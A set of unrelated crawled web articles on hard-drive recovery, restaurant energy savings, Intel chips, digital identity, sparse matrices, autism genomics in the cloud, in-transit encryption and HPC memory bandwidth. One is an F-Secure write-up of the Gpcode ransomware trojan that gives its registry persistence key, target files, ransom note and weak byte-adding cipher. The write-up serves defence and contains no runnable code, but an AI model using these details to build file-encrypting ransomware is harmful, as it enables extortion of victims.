http://www.itnews.com/article/2970130/space-agency-head-wants-to-build-a-village-on-far-side-of-moon.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280242.65/warc/CC-MAIN-20170116095120-00532-ip-10-171-10-70.ec2.internal.warc.gz
en
0.961071
396
2.875
3
The client in this Western Digital HDD repair case needed pictures and documents recovered from their 320 GB Western Digital hard drive. The drive had failed, producing an audible, rhythmic clicking noise. For a hard drive, clicking is one of the most iconic sounds of failure. If computer repair is your line of work, you can probably pick out the “click of death” on sight (er, sound). Western Digital HDD Repair Case Study: Winter is Coming Drive Model: Western Digital WD3200BEVT-60ZCT0 Drive Capacity: 320 GB Operating System: Windows Situation: Drive started clicking and was put in freezer Type of Data Recovered: Pictures and Documents Binary Read: 55% Gillware Data Recovery Case Rating: 9 Why Broken Hard Drives Click Hard drives are naturally noisy creatures, although most modern ones are relatively quiet. (Old Maxtor and Hitachi hard drives especially can make quite a racket, though, even when they are healthy.) When a hard drive’s read/write heads unpark and position themselves above the spinning hard disk platters, a single click usually accompanies the movement. Our engineers sometimes refer to this as the “happy sound” because it means that the heads have positioned themselves properly over the firmware sectors and made a handshake with the drive’s firmware. When a hard drive fails, it will often produce a rhythmic ticking noise. Your hard drive has decided to quit its job as a data storage device and begin a new career as a metronome. The rhythmic ticking comes from the read/write heads as they fly over the platters. For some reason—usually heads failure—the read/write heads cannot make contact with the firmware. And so they blindly fly back and forth over the firmware sectors. The heads produce an audible click every time they complete one round-trip across the hard disk platters’ radius. Single clicks are usually good news. They’re a sign that, at the very least, the read/write heads can read data. (Whether or not the data is there, or makes sense, though, is another story.) The bad news comes when your hard drive decides to give you its best impression of a grandfather clock. Hard drives can make much nastier noises than these light clicks. When a hard drive produces exceptionally loud clicks or grinding noises, it is usually a sign that the read/write heads have suffered a catastrophic failure, and the data storage platters may be at risk. Western Digital HDD Repair Evaluation As soon as the clicking Western Digital hard drive came into our lab, our cleanroom data recovery technician Kirk inspected the drive’s internal components. Kirk found that something peculiar on the hard disk platters. Hard disk platters are coated with metal alloys and burnished, giving them a mirror shine. A healthy set of hard drive platters is free of dust and debris, making the platters perfect mirrors. These platters were not perfect mirrors. Their surfaces had what appeared to be a cloudy, hazy film over them. We discovered that, in an attempt to fix the drive, the client had put it in their freezer and let it sit before trying to power it on again. The “Freezer Trick”, and Why Not to Do It At Gillware, our data recovery experts tend to frown on most forms of DIY hard drive data recovery. DIY data recovery myths, such as simply swapping control boards or tapping misbehaving drives with hammers, tend to be misguided and outdated at best and destructive at worst. We dislike the freezer trick in particular. When you need data recovered from a hard drive with corrupted or deleted data or a reformatted drive, data recovery software can be a low-risk tool as long as it’s used carefully. But when a hard drive is clicking or making other unusual noises, do-it-yourself data recovery is extremely risky business. A major threat to hard drives, especially freezer-cooled drives, is moisture in the air. For example, hard drives cannot be safely run if the relative humidity of the air around them climbs past 90%. When you freeze a hard drive, any moisture in the air on the inside or the outside of the drive will condense into liquid water, and then freeze. And then when you remove the drive from its icy tomb, the hot air will immediately start to melt the frozen water. Water is bad for hard drives. If it condenses on the platters, it can corrode them, and can also easily cause head crashes and severe rotational scoring. If it condenses on the drive’s control board, it can cause an electrical short. Even double-bagging the drive (as “freezer trick” proponents suggest) will not remove all water vapor from the drive. A rapid change in temperature can create even the smallest amounts of condensed moisture inside your hard drive, which could cause massive internal damage. There are a very limited set of scenarios in which a failed hard drive will start working again after you’ve cooled it down to subzero temperatures. If the control board is burned out, subzero temperatures will not un-fry it. Nor will they un-stick crashed read/write heads or stuck spindle motors, magically repair rotational scoring, or somehow undo logical corruption. Your icebox is not a hard drive cure-all. Winter is coming. Please don’t leave your hard drives out in the cold. Western Digital HDD Repair Process This WD hard drive’s frozen platters might have been a death sentence only a few years ago. But our data recovery experts were not going to let this case go. In their current state, with condensed moisture fogging up their mirrored surfaces, these platters were unreadable. Read/write heads are tiny, and hover only a few nanometers above the surfaces of the platters. To them, even tiny droplets of water are massive. Running the drive would be like flying a plane into a mountain. To proceed with this Western Digital HDD repair case, the platters needed to get their mirrored shine back. Fortunately for our client, we have the tools to do it. After some careful polishing and a round in our state-of-the-art glide burnishing equipment, the hard disk platters once again had their natural luster. From that point on, it was a simple matter of replacing the failed read/write heads with a new set from a compatible donor. Sometimes, finding a compatible set of donor parts can be difficult due to the tiny variations between otherwise-identical hard drives. But in this case, it only took one set of replacement parts to recover the client’s photos and documents. After reading 55% of the sectors on the drive’s platters, we had 99.9% of the client’s data and all of their critical files. We rated this Western Digital HDD repair case a 9 on our ten-point rating scale. If you need Western Digital HDD repair services, don’t put your hard drive on ice. Western Digital themselves recommend Gillware as a preferred data recovery lab. If you still feel like trying the freezer trick for yourself, watch this classic video of our president Scott Holewinski demonstrating what can happen to the platters in a Western Digital hard drive if you run it after letting it sit in the freezer:
<urn:uuid:09027dc6-3284-4997-81c9-30ff4d06999b>
CC-MAIN-2017-04
https://www.gillware.com/blog/data-recovery-case/western-digital-data-recovery-freezer-trick/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280242.65/warc/CC-MAIN-20170116095120-00532-ip-10-171-10-70.ec2.internal.warc.gz
en
0.933712
1,535
2.515625
3
According to the National Restaurant Association (www.restaurant.org) restaurants use five times more energy per square foot than other commercial buildings. As more and more restaurants in the industry adopt eco-conscience initiatives in an effort to reduce energy consumption, many will find that these green practices are doing more than just reducing their carbon footprint. They also yield some significant savings, and in a time where the economy is in a downturn this is a welcomed benefit. Yet many restaurant operators that are interested in pursing green options may need some help in differentiating which implementations will help reduce their bottom line. The key to implementing money-saving green practices is to strategically align initiatives that are sustainable over the long run. Over the past few months, Garden Fresh Restaurant Corp. (www.souplantation.com) (GFRC), parent company to Souplantation and Sweet Tomatoes, has identified three initiatives in particular to be great ways to save money and go green at the same time. 1. Energy efficient HVAC and hot water systems Installing smart energy controllers on a restaurant's HVAC and water heating systems is one green way that operators can save money. These state-of-the-art devices are programmed to bring water to full temperature at only specific times of the day along with matching heating and air conditioning to the operating needs of the restaurant. The controllers gather data from monitoring regular use patterns and implement corrective measures that reduce spike loads. Last fall, GFRC installed monitoring and control technology provided by Orange, Calif.-based Equity Thru Energy (ETE) (www.equitythruenergy.com) at 10 San Diego County sites. GFRC was able to reduce energy waste by maintaining appropriate temperatures throughout the day. The controllers automatically shut systems down during off-peak hours, while enabling on-site managers to adjust controls during unexpected periods of high activity. To ensure ongoing efficiency, smart controllers are monitored through wireless Internet technology. Remote observation prevents tampering with control settings that can lead to waste, and allows for quick alerts and adjustment should anomalies occur. The early warning system will enable operators to make critical repairs before costly damage is incurred and extends the life of the equipment for added savings. With ETE's smart energy controllers, GFRC anticipates a 10 to 15 percent utility cost reduction, translating to a combined savings of $60,000 to $80,000 per year for the 10 stores. 2. Compact fluorescent lighting As advances in eco-kind lighting make incandescent bulbs seem less than bright, operators should consider installing compact fluorescent lights (CFLs) as an additional measure. Miniature versions of full-sized fluorescents, CFLs use 50 percent to 80 percent less energy than equivalent incandescent lamps and save an impressive 2,000 times their weight in greenhouse gases. Although CFLs have a purchase price of up to 10 times more than inefficient alternatives, their extended lifetime (up to 10 times longer) and gentler, long-term environmental impact more than compensate for the higher initial expense. Operators can achieve an average per unit annual savings of nearly $2,900. 3. Reduce, reuse, recycle In terms of large-scale consumption, restaurants stand to realize significant savings through waste reduction and recycling, particularly as disposal fees continue to climb. To promote resource efficiency, operators can switch to using only recyclable paper goods and to improve its waste system to be more cost effective and conservation-minded. This is a measure that GFRC encourages all Souplantation and Sweet Tomatoes outlets to carry out. Joan Scharff joined Garden Fresh Restaurant Corp. in 1990 as a marketing manager and moved up the ranks to executive director of marketing. In 2006, her critical role in the expansion of the Garden Fresh brand and commitment to the company's mission and philosophy lead to her current position as executive director of brand & menu strategy.
<urn:uuid:46a915eb-0953-42d9-9023-1cf875489c4b>
CC-MAIN-2017-04
http://hospitalitytechnology.edgl.com/magazine/January-February-2009/Green-Savings54949
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00440-ip-10-171-10-70.ec2.internal.warc.gz
en
0.925011
793
2.546875
3
More power-efficient chips can offer other benefits as well. Intel estimates that a drop in power consumption could cut the bill to power computers. Otellini said, based on a 30-watt drop in average power management, the new computers could cost $1 billion less to power per year, per 100 million units. Gartner has forecast that the PC market will total over 200 million units in 2005. Meanwhile, continuing its previous course, Intel could possibly have gone in the other direction, driving up the costs of electricity for businesses.Instead, dual-core chips are capable of doing more work for the same amount of electricity. Intel will continue to cut down on power in 2006 and beyond. Its working on an effort to build even lower-power chips, which will help standard PC processors fit into smaller forms, such as palmtop machines that run full versions of Microsoft Corp.s Windows operating system. Those products will start to come out in 2006 as well. Even lower-power chips, including a version of Intels notebook chips that consumes 1 watt or less and allows for even smaller computing machines, will come out later in this decade, Otellini said. Intel didnt always look so closely at power. The Santa Clara, Calif., chip maker in 2000 introduced the speed-fueled Pentium 4 chip, a single-core chip that runs at high clock speeds. Speedier processors, however, generally consume more power, and some Pentium 4s have a TDPan Intel term that refers to how much heat a chip has to dissipatethat averages 100 watts or more, requiring a fair amount of cooling. But Otellini said the company began shifting its focus toward performance per watt about four years ago. It got the effort rolling with its Pentium M, which made its debut in 2003, and then shifted its focus to multicore processors, which came out earlier this year. It will focus most of its efforts, going forward, on multicores and power efficiency. It will offer six new dual-core processors in 2006 and is working on 10 more quad-core or higher multicore chips for later in the decade, Otellini said. Otellini also demonstrated a WiMax wireless link to India and discussed the companys Digital Home PC platform for 2006 in his keynote. Editors Note: This story was updated to clarify the power usage of the new processors. Check out eWEEK.coms for the latest news in desktop and notebook computing. "Multicore CPUs have real promise of changing performance per watt, because you can add cores, without adding much power consumption," said Urs Holzle, a Google fellow, who joined Otellini on stage for a time during the keynote.
<urn:uuid:e8da69e7-08d2-4cd7-8cc2-46f1f1895157>
CC-MAIN-2017-04
http://www.eweek.com/c/a/Desktops-and-Notebooks/Intel-Cuts-the-Power/1
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280723.5/warc/CC-MAIN-20170116095120-00284-ip-10-171-10-70.ec2.internal.warc.gz
en
0.954941
551
2.65625
3
If you work in e-commerce and cyber security policy, law, regulations or strategy, you've almost certainly been taught the difference between "authentication" and "authorisation". One describes 'who you are' and the other what you're allowed to do. The dichotomy is at the heart of most network access control, and it informs almost all contemporary thinking about digital identity. And it's misguided. I believe the sterile language of authentication and authorisation, especially the orthodox primacy of the former over the latter, has distorted the study of digital identity. By making authentication come first, the language cements the tacit assumption that we each have just one main identity, and it surfaces that core identity in all routine transactions. This is not a good starting point if we seek the right balance of security and privacy online. Kim Cameron tried to shift this dichotomy with his "Laws of Identity" but sadly this particular subtlty never quite caught on. Cameron said that digital identity is "a set of claims made by one digital subject about itself or another digital subject". This means that a digital identity is really all about the attributes, breaking the nexus between authentication and authorization. Cameron recognised explicitly that this new view "does not jive with some widely held beliefs – for example, that within a given context, identities have to be unique". And that belief is indeed widespread: it's at the heart of the "nymwars" dispute that erupted over Google's and Facebook's Real Names policies. Unfortunately, for all the forcefullness of the "Laws", opinions about the number of identities we 'really' have remain polarised. People have been confused about the 'real' identity versus digital for a long time. A dogmatic obsession with 'real' identity is what shoved PKI off the rails in the mid 1990s. There are purists who say PKI can only be concerned with identity, but we really need to move away from an absolutist view of authentication. In the vast majority of routine transactions, parties are only interested in authorisation and not identity. The business you're dealing with usually wants to know what you are not who you are. Consider: pharmacists dispensing prescriptions don't "know" (let alone trust) doctors. Investors don't "know" a company's auditors. Airline passengers don't "know" the pilots nor the airframe safety inspectors. Bank customers don't "know" their tellers. Employees don't "know" who signs their pay cheques. The parties to these transactions may be mutual strangers and yet they obviously know enough about one another to be able to transact usefully. Each party has a dependable credential or property in a particular context. In context, they are not total strangers - they know enough about each other to transact is a certain way in a certain setting. An impersonal identifier (or "nym") in context is sufficient for authorization without any personal identification. The idea that authentication and authorisation are different things is an artefact which, it seems to me, arose when 1970s era computer scientists started thinking about resource access control. The distinction does not usually arise in regular real world business, where all that matters in routine transactions is the credentials of the sender, in context. Internet commerce is a collision of worlds: IT and business. And far too many of the default assumptions, language and sheer imaginings of technologists (like "non repudiation") have infiltrated our e-business paradigm. It's ironic because we're told incessantly that e-business and identity management are "not technology issues" and yet the received wisdom of digital identity has come from computer scientists! In IT, "attributes" and authorisation are always secondary to identification and authentication. Yet the real world is subtly different. Yes, I identify myself with a primary authenticator like a drivers licence when I open a new bank account or join a video store. However, I never use that breeder ID again, for the bank and video store each provide me with new credentials; that is, new identities in their respective contexts. Surely the authentication-authorisation split is unhelpful to the twin causes of Internet security and privacy. It exposes to theft more breeder identity information than is generally necessary, and it enables otherwise dispirate business to be joined up. The sooner we cement a new simplifying assumption the better: in most routine transactions, authorisation and not identity is all that matters. Better clarity follows about what the real problem is with digital identity. For the most part, our important business attributes (and the ones that are most prone to ID, like account numbers, social security numbers and government identifiers) are grounded in conventional real world rules. They are issued by bricks-and-mortar institutions, and used online. The main problem is not with existing identity issuance processes; it's with the way perfectly good identities once issued are so vulnerable online. We usually present our ids as simple alphanumeric data, which are passed around through the matrix without any checks on their pedigree. So the real challenge is to preserve the integrity, authenticity and pedigree of the different identities we already have when we exercise them online. This is actually a straightforward technical issue, with readily available solutions using ordinary asymmetric cryptography. It is not at all necessary to engineer a whole new identity paradigm, changing the time-honored conventions by which meaningful context-specific identities are issued. We simply need to take the recognised identities we already have and convey them in a smarter way online. Steve, excellent post per usual. Completely agree about the fact that attributes matter and that even these get confused between those used for authentication and those for authorization. As you probably know we are kicking this around in Kantara Attribute Management Discussion Group here http://kantarainitiative.org/confluence/display/AMDG/Home I agree with the problem as I understand that you have presented it - authorization and authentication have become muddled by, in my opinion, IT driving solutions rather than business. In my opinion, a subject needs to be authorized in order to conduct business transactions and that authorization MAY include authentication. I am not a fan of the way things seem to be done today - authenticate someone and then authorize them to do something. I believe that you are correct in your statement that, in most real world transactions, the service provider just wants to do something to authorize you to receive the service they are offering - either a payment guarantee (credit card, cash, etc) or some proof that you meet some specific requirement (age greater than 18). In my opinion, the vast majority of transactions DO NOT require identity authentication and a larger (but still small) number require some attribute authentication.
<urn:uuid:728b9ae6-7880-4f66-a8ff-059737045e56>
CC-MAIN-2017-04
http://lockstep.com.au/blog/2011/01/22/forget-authentication.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00312-ip-10-171-10-70.ec2.internal.warc.gz
en
0.941843
1,379
2.53125
3
Definition: A matrix that has relatively few non-zero (or "interesting") entries. It may be represented in much less than n × m space. Aggregate child (... is a part of or used in me.) list, orthogonal lists, array, or point access method. See also ragged matrix, huge sparse array. Note: A n × m matrix with k non-zero entries is sparse if k << n × m. It may be faster to represent the matrix compactly as a list of the non-zero entries in coordinate format (the value and its row/column position), as a list or array of lists of entries (one list for each row), two orthogonal lists (one list for each column and one list for each row), or by a point access method. Yousef Saad's Iterative methods for sparse linear systems (PDF), chapters 1-3 of a textbook covering linear algebra and types of matrices. Sparse matrix implementations, including the coordinate format, begin on page 85 (PDF page 97). Other formats and information on a newer edition. If you have suggestions, corrections, or comments, please get in touch with Paul Black. Entry modified 18 December 2009. HTML page formatted Mon Feb 2 13:10:40 2015. Cite this as: Paul E. Black, "sparse matrix", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 18 December 2009. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/sparsematrix.html
<urn:uuid:7e1b8776-ebba-4a47-8794-76738d3f0d30>
CC-MAIN-2017-04
http://www.darkridge.com/~jpr5/mirror/dads/HTML/sparsematrix.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00312-ip-10-171-10-70.ec2.internal.warc.gz
en
0.855285
346
2.828125
3
In the 1966 science fiction classic "Fantastic Voyage," a tiny submarine with a crew of five is miniaturized and injected into a comatose man to surgically laser a blood clot in his brain and save his life. At this week's American Chemical Society Nanoengineering expert Joseph Wang detailed his latest work in developing micromotors and microrockets that are so small that thousands would fit inside this "o" that could bring new medical and industrial applications. [RELATED: High-tech healthcare technology gone wild] Such machines could someday perform microsurgery, clean clogged arteries or transport drugs to the right place in the body. But there are also possible uses in cleaning up oil spills, monitoring industrial processes and in national security, Wang said. "We have developed the first self-propelled micromotors and microrockets that use the surrounding natural environment as a source of fuel," Wang said in a statement. "The stomach, for instance, has a strongly acid environment that helps digest food. Some of our microrockets use that acid as fuel, producing bubbles of hydrogen gas for thrust and propulsion. The use of biocompatible fuels is attractive for avoiding damage to healthy tissue in the body." Fuel and propulsion systems have been a major barrier in moving science fiction closer to practical reality, Wang said. Some micromotors and even-smaller nanomotors have relied on hydrogen peroxide fuel, which could damage body cells. Others have needed complex magnetic or electronic gear to guide their movement. Wang's University of California, San Diego lab has developed two types of self-propelled vehicles - microrockets made of zinc and micromotors made of aluminum. The lab has developed what it calls a tubular zinc micromotor, which is one of the world's fastest, able to move 100 times its 0.0004-inch length in just one second. That's like a sprinter running 400 miles per hour, said Wei Gao, a graduate student in the lab. The zinc lining is biocompatible. It reacts with the hydrochloric acid in the stomach, which consists of hydrogen and chloride ions. It releases the hydrogen gas as a stream of tiny bubbles, which propel the motor forward. "This rocket would be ideal to deliver drugs or to capture diseased cells in the stomach," said Gao. The newest vehicles are first-of-their-kind aluminum micromotors. One type, which also contains gallium, uses water as a fuel. It splits water to generate hydrogen bubbles, which move the motor. "About 70% of the human body is water, so this would be an ideal fuel for vehicles with medical uses, such as microsurgery. They also could have uses in clinical diagnostic tests, in the environment and in security applications," Gao stated. Another development - an aluminum micromotor -- doesn't have gallium and is the first such motor that can use multiple fuels -- acids, bases and hydrogen peroxide, depending upon its surroundings, opening it up for use many more environments than ever before, Gao noted. According to a Wikipedia entry, Wang has long led development of biosensors, bioelectronics and nanotechnology. Wang's work in the field of nanomachines, involving novel motor designs and applications, has led to the world fastest nanomotor, to a novel motion-based DNA biosensing, and nanomachine-enabled isolation of biological targets, such as cancer-cell isolation and to advanced motion control in the nanoscale. He has also pioneered the use of body-worn printed flexible electrochemical sensors including textile and tattoo biosensors. Check out these other hot stories:
<urn:uuid:ddfa7716-e8e5-4f55-8f2d-aac97bbc21c2>
CC-MAIN-2017-04
http://www.networkworld.com/article/2224446/applications/-fantastic-voyage--microrocket-technology-coming-to-a-body-near-you----maybe-yours.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280065.57/warc/CC-MAIN-20170116095120-00001-ip-10-171-10-70.ec2.internal.warc.gz
en
0.958713
764
3.5
4
Gpcode is a trojan that encrypts files with certain extensions on local and remote drives and then asks a user to contact its author to buy a decryption solution. Once detected, the F-Secure security product will automatically disinfect the suspect file by either deleting it or renaming it. More scanning & removal options More information on the scanning and removal options available in your F-Secure product can be found in the Help Center. You may also refer to the Knowledge Base on the F-Secure Community site for more assistance. F-Secure Anti-Virus is able to detect and decrypt files encrypted by the Gpcode trojan. To find and decrypt such files, please scan ALL files on the hard disk. Basically, the trojan takes the user's files as hostages and asks for a ransom to "free" them, making this a form of ransomware. The trojan's file is a PE executable about 56 kilobytes long, packed with UPX file compressor. After the trojan's file is run by a user it creates a startup key for its file in Windows Registry: - [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "services"="[file name]" where [file name] is the name of the trojan's file. The trojan starts to scan local and remote drives for files with the following extensions: When a file with any of these extension is found, the trojan reads it to memory, encrypts file's data with a simple algorithm, saves encrypted data into a new file (the name of this file is 'coder' + original file's name: for example for FILE.PGP the trojan will create the CODERFILE.PGP file), deletes the original file and then renames the newly created file with the name of the original file. After that the trojan creates a text file named ATTENTION!!!.TXT in the same folder where the encrypted file is located. This .txt file contains the following text: - Some files are coded. - To buy decoder mail: email@example.com - with subject: PGPcoder 000000000032 All encrypted files have the following 21 byte text string in their beginning: - PGPcoder 000000000032 The encryption algorithm is quite simple - the trojan uses ADD operation on the original file's data with a single byte encryption key. The original value of the encryption key is 58 (0x3a) and it is modified using 2 fixed byte values which are 37 (0x25) and 92 (0x5c) after encryption of each next byte of the original file's data. While the trojan scans local and remote drives, it keeps a track of all found folders and files in the AUTOSAVE.SIN file that is created in a temporary folder. After all files are encrypted the trojan terminates its process, deletes its executable file, AUTOSAVE.SIN file and its startup key from the Registry. F-Secure Anti-Virus detects Gpcode.b trojan with the following update:
<urn:uuid:4f41e6c7-2906-490b-847e-24acd7530c11>
CC-MAIN-2017-04
https://www.f-secure.com/v-descs/gpcode.shtml
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280065.57/warc/CC-MAIN-20170116095120-00001-ip-10-171-10-70.ec2.internal.warc.gz
en
0.867479
662
2.59375
3
The autism group Autism Speaks is adopting the Google Cloud Platform so that researchers around the world can access it in one place for autism research. After 15 years of collecting DNA data about autism, the group Autism Speaks has brought together a huge amount of data about some 12,000 people affected by autism. Now it is uploading about 100TB of that data to the Google Cloud Platform, where for the first time it can be stored in one place and accessed more easily by researchers from around the world. The transfer of the data to the Google Cloud Platform was announced June 10 by Robert Ring, the chief science officer of Autism Speaks, the world's largest autism science and advocacy organization, in a guest post on the Google Cloud Platform Blog The DNA data is being sequenced by the group's AUT10K program in collaboration with the University of Toronto's Hospital for Sick Children's Centre for Applied Genomics, with sequencing for about 1,000 cases already completed and an additional 2,000 other samples nearing completion, wrote Ring. The huge amount of data and the research that is continuing are the key reasons for the move to the Google Cloud platform, he explained. "From the beginning, we realized that the amount of data collected by AUT10K would create many challenges. We needed to find a way to store and analyze massive data sets, while allowing remote access to this unprecedented resource for autism researchers around the world." That's why the Google platform was chosen, he wrote. "In the beginning, we shared genomic information by shipping hard drives around the world. Downloading even one individual's whole genome in a conventional manner can take hours—the equivalent of downloading a hundred feature films. And by the time AUT10K achieves its milestone of 10,000 genomes, we knew we'd have a database on the petabyte scale." Using the Google Cloud Platform, Autism Speaks researchers can store data and enable real-time, collaborative access among researchers around the world, wrote Ring. "We are in the process of uploading 100 terabytes of data to Google Cloud Storage, and from there, we can import it into Google Genomics . Google Genomics will allow scientists to access the data via the Genomics API, explore it interactively using Google BigQuery , and perform custom analysis using Google Compute Engine The key benefit of the data transfers and central storage is efficiency, he wrote. "Researchers will spend less time moving data around and more time analyzing data and collaborating with colleagues. We hope this will enable us to make discoveries and drive innovation faster than ever." About one in 68 children in the United States is on the autism spectrum, according to Ring. "Caused by a combination of genetic and environmental influences, autism is characterized, in varying degrees, by deficits in social communication and interaction, along with the presence of repetitive patterns of behavior, interests or activities. Many individuals with autism also face a lifetime of associated medical conditions (e.g. anxiety, sleep problems, seizures and/or GI symptoms) that frequently contribute to poor outcomes." The use of the Google Cloud Platform by autism researchers can drastically improve the group's research and knowledge, he wrote. "Together, we hold the capability of accelerating breakthroughs in understanding the causes and subtypes of autism in ways that can advance diagnosis and treatment as never before." Google's connections with health care are deep. In March 2014, Google expanded its involvement in medical science around the world by joining the Global Alliance for Genomics and Health as part of an effort to expand and advance genomics research that could keep humans healthier. Some 146 organizations from some 21 countries around the world are members of the group so far. As part of its efforts to bring innovation to the genomics alliance, Google is proposing the use of a simple Web-based API to import, process, store and search genomic data at scale, as well as a collection of in-progress open-source sample projects built around the common API, according to an earlier eWEEK In September 2013, Google launched a new health care company , called Calico , to find ways to improve the health and extend the lives of human beings. The startup is focusing on health and well-being, and in particular, the challenge of aging and its associated diseases, according to Google. Calico wasn't the first health care-related push undertaken by Google. Back in 2008, Google launched its Google Health initiative , which aimed to help patients access their personal health records no matter where they were, from any computing device, through a secure portal hosted by Google and its partners, according to earlier eWEEK reports. Google Health shut down in January 2013.
<urn:uuid:76c94e7d-545d-447d-966a-78ad41cea19f>
CC-MAIN-2017-04
http://www.eweek.com/cloud/google-cloud-platform-being-used-in-autism-research.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281426.63/warc/CC-MAIN-20170116095121-00211-ip-10-171-10-70.ec2.internal.warc.gz
en
0.945667
957
2.609375
3
Cast your mind back to the last time you were offline – not just when your connection was down, but a time when you were truly, unequivocally disconnected. That time may have been spent sending letters, physically going into a bank to make a deposit or withdrawal, and actually meeting with people to share information. Nowadays, we're far more efficient thanks to our reliance on connectivity and the network. During the past 20 years or so, information has evolved in line with the network, and become largely a digital commodity that can be sent and received with the click of a mouse. Electronic communications now cross organizations and oceans with relative ease, in volumes that seemed unfathomable during the days when postal mail was king. But all of this need for connectivity comes with a downside: criminal elements seeking to steal that data – and make no mistake, something as seemingly innocent as a personal email can be as valuable to a criminal as a bank transaction. Our data can be used by others for monetary gain (stolen credit card numbers) or, in some instances, blackmail and identity theft. Passwords and authentication now act as the key to the front door for the myriad of valuable data behind it. So, to provide an additional layer of protection we began to encrypt the data – scrambling it in such a way that intruders could not easily decipher the information without another key. Can people still get that data? With a bit of concerted effort, sure, getting through is a possibility – but that's why we also have firewalls, anti-virus software and intrusion detection systems. We're clearly serious about protecting our data when it's at rest, meaning physically situated within the protected confines of a data center on storage arrays. But what about when you need to get that data from one side of the network to another, such as from a data center storage array to your smartphone? Remember, The Great Train Robbery of 1963 occurred not when the caboose was at rest at a station, but while the train was between stations. It's during transit – meaning, out there on the network and “in-flight” between end-points – that our data can be most vulnerable, especially given the focus we've placed on erecting barricades to protect it while at rest. Encrypting sensitive and mission-critical data while in transit is essential to an overall data security strategy, especially with information moving like never before within the cloud between data centers. Encryption at the optical layer during transport provides a strong and effective safeguard, offering an additional level of protection to enable end-to-end security. While it's true that technologies like Transport Layer Security (TLS) and Secure Sockets Layer (SSL) are increasingly used to secure connections to servers, the only way to secure everything on the communications link in and out of a facility is to encrypt at the physical layer. TLS and SSL solutions also generally rely on third-party certificate authorities that may themselves be compromised, allowing for man-in-the middle attacks. In addition, the traditional operational model for deploying and maintaining protocol-specific encryption solutions can quickly become cumbersome, complex, and costly with multiple encrypt/decrypt pairs being required to support a multi-protocol environment. At the converged packet-optical transport layer, a wide variety of traffic types, such as Ethernet, Fibre Channel, OTN, SONET, and SDH, can be encrypted simultaneously. Further, optical layer encryption guarantees transparent encryption at wire-speed. In other words, the encryption process does not reduce the traffic throughput of the signal being encrypted, nor does it modify the user data in any way. Additionally, by encrypting all traffic before it enters the fiber, it ensures the entire data channel is encrypted no matter what application or device generated the signal. Can security of our data ever truly be guaranteed? It remains an open question, especially as the sophistication of those keen to steal it increases. The best practice is to use a nested set of complementary tools to create a barrier between that valuable information and those who seek it. The focus on protecting information at-rest has been a concerted one. However, it's now imperative that we show similar dedication to protecting our data when it's at its most vulnerable – while it's in flight, out there, alone on the network, as it traverses tens to thousands of kilometers. This article is published as part of the IDG Contributor Network. Want to Join?
<urn:uuid:4764e727-dd3a-42ec-a089-e07736ceaa67>
CC-MAIN-2017-04
http://www.networkworld.com/article/3024238/network-security/protecting-against-the-next-great-heist-by-encrypting-in-transit-data.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285315.77/warc/CC-MAIN-20170116095125-00027-ip-10-171-10-70.ec2.internal.warc.gz
en
0.958231
909
2.71875
3
As we move from multicore to manycore processors, memory bandwidth is going to become an increasingly annoying problem. For some HPC applications it already is. As pointed at in a recent HPCwire blog, a Sandia study found that certain classes of data-intensive applications actually run slower once you try to spread the computations beyond eight cores. The problem turned out to be insufficient memory bandwidth and the contention between processor for memory access. That is certainly not the case for all applications. But beyond that, it’s not always useful to focus on memory bandwidth limitations when considering how to get the most out of your processors. A recent blog post penned by TACC’ers Dan Stanzione and Tommy Minyard suggest we look at the problem somewhat differently. To being with, the authors think the whole notion of trying just to maximize core usage is somewhat misplaced. They write: Leaving a core idle is considered “wasteful”. This is not surprising, but upon careful reflection doesn’t make that much sense… No one considers it a “waste” if while running a job on every core of your machine, half your memory is empty, or half your network is unused, or you are only using half the available IOPS or bandwidth to your disk drive. Stanzione and Minyard go on to say that the real metric you should be concerned about is how much work your cluster is getting done in a given time period. So for certain workload mixes, it might make sense to let cores go idle in order to ensure the remaining cores are left with enough memory bandwidth for fast execution. Or you could mix compute-intensive applications with data-intensive ones so that both cores and memory usage can be more utilized — assuming you have the right mix of applications to choose from. Of course, not every HPC installation has the luxury of choosing an optimal mix of applications. What if you’re stuck with running a memory-hungry application, like the Weather Research and Forecasting (WRF) code, all of the time? The TACC authors actually came up with some interesting data points using WRF on Xeon platforms. They found that going beyond 8 cores per node yielded diminishing returns in speedup (not quite so bad as the Sandia study, which demonstrated lost performance beyond 8 cores). Using Intel Westmere CPUs they were only able to achieve a 12 percent performance improvement going from 8 to 10 cores, and just 2.7 percent when going from 10 to 12 cores. So what do you do in this scenario? Stanzione and Minyard write: Well, maybe it tells the WRF developers that you can do a whole lot more computation between memory accesses essentially for free on the new processors. Maybe it says you can run some not-so-memory-intensive jobs alongside your WRF jobs on those extra cores essentially for free. But perhaps the most important thing it says is that to get maximum throughput nowadays, you shouldn’t assume that the best and most efficient configuration is to use every core in every socket for your job. For some kinds of programs you will, for some kinds of programs you won’t… but isn’t it nice to have all that extra compute power lying around for the times that you need it? Well yes, that is nice, especially if you can afford to deploy such systems. On the other hand, the AMD folks might point out that their Opteron solutions achieve a better balance between CPU FLOPS and memory bandwidth than the Xeons. The NVIDIA folks, one assumes, would have an entirely different suggestion.
<urn:uuid:45d7e82e-589a-4977-a4b2-016f94cd8e53>
CC-MAIN-2017-04
https://www.hpcwire.com/2010/10/28/is_underutilizing_processors_such_an_awful_idea/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279189.36/warc/CC-MAIN-20170116095119-00515-ip-10-171-10-70.ec2.internal.warc.gz
en
0.945095
743
2.671875
3
